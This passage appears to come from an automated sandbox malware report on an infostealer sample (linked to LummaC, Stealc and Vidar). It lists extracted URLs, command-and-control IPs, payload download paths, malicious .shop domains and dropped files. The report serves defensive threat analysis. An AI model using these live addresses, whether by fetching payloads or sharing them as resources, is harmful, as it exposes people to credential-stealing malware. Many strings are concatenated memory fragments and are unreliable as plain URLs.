                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.68.138/u~RegAsm.exe, 0000000C.00000002.2377742353.00000000012EF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeRegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiGHJKJD.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallJEGHJD.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAKFIDH.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://147.45.68.138:80CARegAsm.exe, 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.68.138:80file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.68.138:80form-data;RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.68.138:80ocalRegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.entrust.net/ts1ca.crl0file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://stadiatechnologies.comntent-Disposition:RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.68.138:80hellohttps://steamcommunity.com/profiles/76561199761128941bfile.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://t.me/iyigunlsql.dllsqlr.dllInfile.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.sqlite.org/copyright.html.RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134269337.000000001D4AD000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://147.45.68.138/mozglue.dll%RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exe1kkkk1035441http://147.45.44.104/prog/66d0cd9a65b5dRegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.68.138/msvcp140.dll?RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.68.138/(RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://mozilla.org0/RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://147.45.68.138/KEBGIRegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgRegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://traineiwnqo.shop/apibuRegAsm.exe, 00000009.00000002.2376623871.000000000102E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoAKFIDH.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.68.138:80790dee73nt-Disposition:RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://stadiatechnologies.comRegAsm.exe, 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.entrust.net/rpa03file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://aia.entrust.net/ts1-chain256.cer01file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AKFIDH.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaRegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://upx.sf.netAmcache.hve.19.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp, JEGHJD.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exeorm-data;RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exeRegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.ecosia.org/newtab/AKFIDH.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://147.45.68.138/nss3.dllhbRegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brEBKJDB.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exem-data;RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.68.138:80AERegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ac.ecosia.org/autocomplete?q=AKFIDH.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://147.45.68.138/nss3.dll9bRegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://147.45.68.138/b=RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.68.138:80eRegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000045F000.00000040.00000400.00020000.00000000.sdmpfalse
                          		unknown
                          http://147.45.68.138/sql.dllLbzRegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://support.mozilla.orgEBKJDB.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://147.45.68.138:80AFsrss.exeRegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesJEGHJD.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://147.45.68.138/sql.dllurerRegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=AKFIDH.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://64532127VdtSrezylanAPHTGetSystemInfoGetSystemTimeSleepkernel32.dllSymMatchStringInternetSetOpfile.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.entrust.net/2048ca.crl0file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://traineiwnqo.shop/RegAsm.exe, 00000009.00000002.2376623871.000000000104D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://147.45.68.138/G=6fRegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.entrust.net/rpa0file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          95.164.119.162
                          		stadiatechnologies.comGibraltar
                          		39762VAKPoltavaUkraineUAtrue
                          188.114.97.3
                          		locatedblsoqp.shopEuropean Union
                          		13335CLOUDFLARENETUStrue
                          188.114.96.3
                          		traineiwnqo.shopEuropean Union
                          		13335CLOUDFLARENETUStrue
                          147.45.44.104
                          		unknownRussian Federation
                          		2895FREE-NET-ASFREEnetEUfalse
                          147.45.68.138
                          		unknownRussian Federation
                          		2895FREE-NET-ASFREEnetEUtrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1501434
                          Start date and time:2024-08-29 22:51:05 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 16s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:21
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@22/39@4/5
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 91
                          • Number of non-executed functions: 203
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 52.168.117.173
                          • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          16:52:18API Interceptor4x Sleep call for process: RegAsm.exe modified
                          16:53:04API Interceptor1x Sleep call for process: WerFault.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          95.164.119.162file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousVidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • stadiatechnologies.com/
                          188.114.97.3Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                          • www.coinwab.com/kqqj/
                          file.exeGet hashmaliciousLummaCBrowse
                          • joxi.net/4Ak49WQH0GE3Nr.mp3
                          Document_pdf.exeGet hashmaliciousFormBookBrowse
                          • www.x0x9x8x8x7x6.shop/dscg/
                          QUOTATION_AUGQTRA071244#U00b7PDF.scrGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/zbi9vNYx/download
                          z1209627360293827.exeGet hashmaliciousDBatLoader, FormBookBrowse
                          • www.coinwab.com/kqqj/
                          file.exeGet hashmaliciousLummaCBrowse
                          • joxi.net/4Ak49WQH0GE3Nr.mp3
                          Rudvfa0Z17.exeGet hashmaliciousNitolBrowse
                          • web.ad87h92j.com/4/t.bmp
                          nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                          • web.ad87h92j.com/4/t.bmp
                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/0U9QqTZ6/download
                          QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • filetransfer.io/data-package/e0pM9Trc/download

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          traineiwnqo.shopfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 188.114.97.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.97.3
                          0VCartoonizer_Trial.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.97.3
                          0Subtitle Edit.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          0Subtitle Edit.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          Setup.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          locatedblsoqp.shopfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 188.114.97.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.96.3
                          0VCartoonizer_Trial.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.97.3
                          0Subtitle Edit.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          0Subtitle Edit.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          Setup.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          awwardwiqi.shopfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          stadiatechnologies.comfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousVidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 95.164.119.162

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
                          • 172.64.41.3
                          4QihT6CwD8.exeGet hashmaliciousAzorultBrowse
                          • 104.21.2.6
                          https://5kirp.mellifluous5.com/5kiRp/Get hashmaliciousHTMLPhisherBrowse
                          • 172.66.0.227
                          https://autode.sk/4g6XSl8&c=E,1,I0OgoTIAL6zcaU4kgbWKwMGE3oDCv6iOL9CcUXdPtaitrRYDaY2yqyg5z3Y_ue3psEsBTb_33PlDmEStP6z69HizNf2ISciGwmDuh9q-ApyQjjb2ectuilD2Rn0,&typo=1Get hashmaliciousUnknownBrowse
                          • 104.17.246.203
                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 188.114.96.3
                          rPEDIDO.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.13.205
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
                          • 104.21.10.159
                          Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                          • 188.114.97.3
                          VAKPoltavaUkraineUAfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousVidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 95.164.119.162
                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 95.164.119.162
                          FREE-NET-ASFREEnetEUfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 147.45.68.138
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 147.45.68.138
                          Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 147.45.44.104
                          file.exeGet hashmaliciousRedLineBrowse
                          • 147.45.47.251
                          eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 147.45.44.104
                          iBO7gzlZr3.exeGet hashmaliciousLummaCBrowse
                          • 147.45.44.104
                          T4txxS1LHs.exeGet hashmaliciousRHADAMANTHYSBrowse
                          • 147.45.47.72
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 147.45.68.138
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 147.45.68.138
                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 147.45.68.138
                          CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
                          • 172.64.41.3
                          4QihT6CwD8.exeGet hashmaliciousAzorultBrowse
                          • 104.21.2.6
                          https://5kirp.mellifluous5.com/5kiRp/Get hashmaliciousHTMLPhisherBrowse
                          • 172.66.0.227
                          https://autode.sk/4g6XSl8&c=E,1,I0OgoTIAL6zcaU4kgbWKwMGE3oDCv6iOL9CcUXdPtaitrRYDaY2yqyg5z3Y_ue3psEsBTb_33PlDmEStP6z69HizNf2ISciGwmDuh9q-ApyQjjb2ectuilD2Rn0,&typo=1Get hashmaliciousUnknownBrowse
                          • 104.17.246.203
                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 188.114.96.3
                          rPEDIDO.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.13.205
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
                          • 104.21.10.159
                          Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                          • 188.114.97.3

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.97.3
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 188.114.97.3
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          • 188.114.96.3
                          rBslc_Pymt-Hs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                          • 188.114.97.3
                          • 188.114.96.3
                          Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                          • 188.114.97.3
                          • 188.114.96.3
                          Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.97.3
                          • 188.114.96.3
                          66cf818156193_ldjfnsfd.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          • 188.114.96.3
                          0VCartoonizer_Trial.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          • 188.114.96.3
                          eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.97.3
                          • 188.114.96.3
                          0Subtitle Edit.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          • 188.114.96.3

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\ProgramData\KKJEBAAECB.exefile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            file.exeGet hashmaliciousLummaC, VidarBrowse
                              C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                    Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                      file.exeGet hashmaliciousVidarBrowse
                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                          eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                  C:\ProgramData\KJKJJJECFI.exefile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    file.exeGet hashmaliciousLummaC, VidarBrowse

                                                      Created / dropped Files

                                                      C:\ProgramData\JDGHIIJKEBGI\JJDHID

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                      Category:dropped
                                                      Size (bytes):28672
                                                      Entropy (8bit):2.5793180405395284
                                                      Encrypted:false
